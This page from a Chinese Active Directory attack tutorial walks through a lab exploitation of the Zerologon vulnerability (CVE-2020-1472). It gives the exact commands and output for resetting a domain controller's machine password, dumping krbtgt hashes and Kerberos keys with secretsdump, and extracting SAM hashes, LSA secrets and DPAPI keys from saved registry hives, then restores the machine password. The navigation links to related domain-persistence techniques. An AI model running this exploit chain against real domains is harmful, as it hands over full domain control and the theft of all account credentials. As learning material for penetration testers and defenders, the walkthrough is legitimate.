5.3 CVE-2020-1472 NetLogon 权限提升漏洞

1、Python脚本复现

（1）检测漏洞

(base) ┌──(root㉿Kali)-[~/tools/CVE-2020-1472]
└─# python3 zerologon_tester.py WIN2019-DC3 10.10.4.8
Performing authentication attempts...
========================================================================================================================================
Success! DC can be fully compromised by a Zerologon attack.

2、重置域控Hash

(base) ┌──(root㉿Kali)-[~/tools]
└─# python3 cve-2020-1472-exploit.py WIN2019-DC3 10.10.4.8
Performing authentication attempts...
=================================================================================================================================================================================================================================================================================================================================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit comple

Hash Dump

(base) ┌──(root㉿Kali)-[~/tools]
└─# secretsdump.py "sec/WIN2019-DC3$"@10.10.4.8 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc-user "sec/krbtgt"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1258230d20deb8fa8c0ee72e014ae813:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:f17ecd5329b2b676b5737a7e40c5cd26337048e048b09663ceef99178afff9d8
krbtgt:aes128-cts-hmac-sha1-96:48387c994c399862ae5ef5a7c86f0c8e
krbtgt:des-cbc-md5:512a436789e32394
[*] Cleaning up...

(base) ┌──(root㉿Kali)-[~/tools]
└─#

3、恢复域控机器账户

（1）域控上导出三个文件

PS C:\Users\Administrator.SEC\Desktop> reg save HKLM\SYSTEM system.save
The operation completed successfully.
PS C:\Users\Administrator.SEC\Desktop> reg save HKLM\SAM sam.save
The operation completed successfully.
PS C:\Users\Administrator.SEC\Desktop> reg save HKLM\SECURITY security.save
The operation completed successfully.
PS C:\Users\Administrator.SEC\Desktop>

secretdump

(base) ┌──(root㉿Kali)-[~/test]
└─# secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x52481e6ce2013131841d5043b3110eb6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:27d86657f458a28aeed03655ba6a6137:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:5f0030005d00550060004800770040002e00260061006700320035005c006d0056007a0079002a002b006900440068002f0049002a006900440034002a00620051003700500048005a004c003f00640056005500650050003c0074006500670026002c00510041002d0048002200260066005a0046004d00650033004900320075006f003700490025003f003c00410039007700410059006c0047005a00430079002900240024005d0042004d0055006c003b003f002f004a00230025006f00230061006c006000470028002600650077004400720060004e005a007500770067002b0030002f003900730032007000
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:e6cd7a62e91562c9a03411c327d87489
[*] DPAPI_SYSTEM
dpapi_machinekey:0xbfa5e3ae33400580554e08da2c245d9164de9fbc
dpapi_userkey:0xe8a4e229ff0f4154a7803fcd95935e33718551a8
[*] NL$KM
 0000   1E B8 DC F1 C1 8A 90 6E  A9 73 12 C8 97 B1 F1 56   .......n.s.....V
 0010   BD 95 49 E0 F8 0B BE CB  DB CB 4D F9 E7 5E 18 B8   ..I.......M..^..
 0020   01 8E 73 41 64 2B 7C C8  F9 2F 30 51 D7 4C CA B5   ..sAd+|../0Q.L..
 0030   99 22 A1 36 2E 61 20 E6  F1 B3 7E FA 26 E9 5D 12   .".6.a ...~.&.].
NL$KM:1eb8dcf1c18a906ea97312c897b1f156bd9549e0f80bbecbdbcb4df9e75e18b8018e7341642b7cc8f92f3051d74ccab59922a1362e6120e6f1b37efa26e95d12
[*] Cleaning up...

(2) python恢复Hash

(base) ┌──(root㉿Kali)-[~/tools/zerologon]
└─# python3 reinstall_original_pw.py WIN2019-DC3 10.10.4.8 e6cd7a62e91562c9a03411c327d87489
Performing authentication attempts...
=============================================================================================================================================================================================================
NetrServerAuthenticate3Response
ServerCredential:
    Data:                            b'\xc1Gh6\xd3\x8c\x80{'
NegotiateFlags:                  556793855
AccountRid:                      1160
ErrorCode:                       0

server challenge b'\xc1h\x1bZ\x08Gd\x8e'
session key b'\xa1\xca\xfbF\xfc\nk@H\xd2\x10Yb^\xf3\x0b'
NetrServerPasswordSetResponse
ReturnAuthenticator:
    Credential:
        Data:                            b'\x01\xaa\xf6\r\xe7m-\x0c'
    Timestamp:                       0
ErrorCode:                       0

Success! DC machine account should be restored to it's original value. You might want to secretsdump again to check.

(base) ┌──(root㉿Kali)-[~/tools/zerologon]
└─#

Powershell恢复


PS C:\Users\Administrator.SEC\Desktop> Reset-ComputerMachinePassword
PS C:\Users\Administrator.SEC\Desktop>

菜单

分享

5.3 CVE-2020-1472 NetLogon 权限提升漏洞

1、Python脚本复现

2、重置域控Hash

3、恢复域控机器账户

评论

6.7 域权限维持之AdminSDHolder滥用

6.6 域权限维持之重置DSRM密码

3.7 Kekeo

2.1 域常见名词

1.2 Kerberos协议

6.9 域权限维持之伪造域控

6.5 域权限维持之SID History滥用

2.8 服务主体名称

1.1 LM、NTLM协议

6.10 后渗透密码收集之 Hook PasswordChangeNotify